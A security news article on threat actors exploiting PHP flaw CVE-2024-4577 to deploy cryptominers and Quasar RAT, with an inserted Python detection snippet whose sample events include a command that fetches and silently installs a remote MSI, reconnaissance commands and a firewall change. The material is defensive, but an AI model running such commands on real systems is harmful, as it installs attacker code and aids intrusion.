Threat actors are exploiting a serious security flaw in PHP to deliver cryptocurrency miners and remote access trojans (RATs) such as Quasar RAT.
The vulnerability, assigned the CVE identifier CVE-2024-4577, is an argument injection flaw in PHP affecting Windows-based systems running in CGI mode that can allow remote attackers to execute arbitrary code.
Cybersecurity company Bitdefender said it has observed exploitation attempts against CVE-2024-4577 since late last year, with a significant concentration reported in Taiwan (54.65%), Hong Kong (27.06%), Brazil (16.39%), Japan (1.57%) and India (0.33%).
About 15% of the detected exploitation attempts involve basic vulnerability checks using commands such as "whoami" and "echo".
Martin Zugec, Technical Solutions Director at Bitdefender, noted that about 5% of the detected attacks resulted in the deployment of the XMRig cryptocurrency miner.
"Another smaller campaign involved the deployment of NiceHash miners, a platform that allows users to sell computing power for cryptocurrency," Zugec added. "The miner process was disguised as a legitimate application, such as javawindows.exe, to evade detection."
Other attacks have been found to weaponize the flaw to deploy remote access tools such as Quasar RAT, as well as to execute malicious Windows installer (MSI) files hosted on remote servers using cmd.exe.
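As an added illustration (not part of the Bitdefender report or the original article), the following Python snippet flags the post-exploitation behaviors described above in Sysmon-style process-creation events: a cmd.exe shell spawned by php-cgi.exe running reconnaissance commands or netsh firewall changes, msiexec pulling an MSI from a remote URL, and a miner masquerading as a Java binary. The event fields, detection tag names and sample events are assumptions constructed for this example.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    parent: str   # parent process image path (assumed Sysmon-style field)
    image: str    # image path of the newly created process
    cmdline: str  # full command line

RECON_CMDS = {"whoami", "echo"}
MINER_NAMES = {"xmrig", "nicehash"}
# Real JDK/JRE launchers; "javawindows.exe" is not one of them.
JAVA_BINARIES = {"java.exe", "javaw.exe", "javaws.exe"}

def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]

def classify(ev: ProcEvent) -> list:
    """Return the detection tags that apply to one process-creation event."""
    parent, image = basename(ev.parent), basename(ev.image)
    cmd = ev.cmdline.lower()
    tokens = set(re.findall(r"[a-z0-9_.-]+", cmd))
    hits = []
    if parent == "php-cgi.exe" and image == "cmd.exe":
        # A CGI worker should not spawn shells at all; sub-classify what ran.
        hits.append("shell-from-php-cgi")
        if tokens & RECON_CMDS:
            hits.append("recon-command")
        if "advfirewall" in tokens:
            hits.append("firewall-change")
    if re.search(r"msiexec(\.exe)?\b.*\bhttps?://", cmd):
        hits.append("remote-msi-install")
    if any(name in cmd for name in MINER_NAMES):
        hits.append("miner-cmdline")
    if image.startswith("java") and image not in JAVA_BINARIES:
        hits.append("java-masquerade")
    return hits

def scan(events):
    """Return (image name, tags) for every event that triggered a rule."""
    return [(basename(e.image), classify(e)) for e in events if classify(e)]

# Constructed sample events; paths, URL and IPs are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\php\php-cgi.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\msiexec.exe",
              "msiexec /i http://203.0.113.10/update.msi /quiet"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Users\Public\javawindows.exe",
              r"C:\Users\Public\javawindows.exe --config=nicehash.json"),
    ProcEvent(r"C:\php\php-cgi.exe", r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c netsh advfirewall firewall add rule name=x dir=in action=block remoteip=198.51.100.7"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Program Files\Java\bin\java.exe", "java.exe -jar app.jar"),
]
```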
The Romanian company said it also observed attempts to modify firewall configurations on vulnerable servers with the aim of blocking access to known malicious IPs associated with the exploitation.
This unusual behavior has raised the possibility that rival cryptojacking groups are competing for control of susceptible resources and preventing them from being targeted a second time. It also aligns with historical observations that cryptojacking attacks are known to terminate rival miner processes before deploying their own payloads.
The development comes shortly after Cisco Talos disclosed details of the PHP flaw being weaponized in attacks targeting Japanese organizations since the beginning of the year.
Users are advised to update their PHP installations to the latest version to protect against potential threats.
"As most campaigns use LOTL tools, organizations should consider limiting the use of tools such as PowerShell within the environment to only privileged users such as administrators," Zugec said.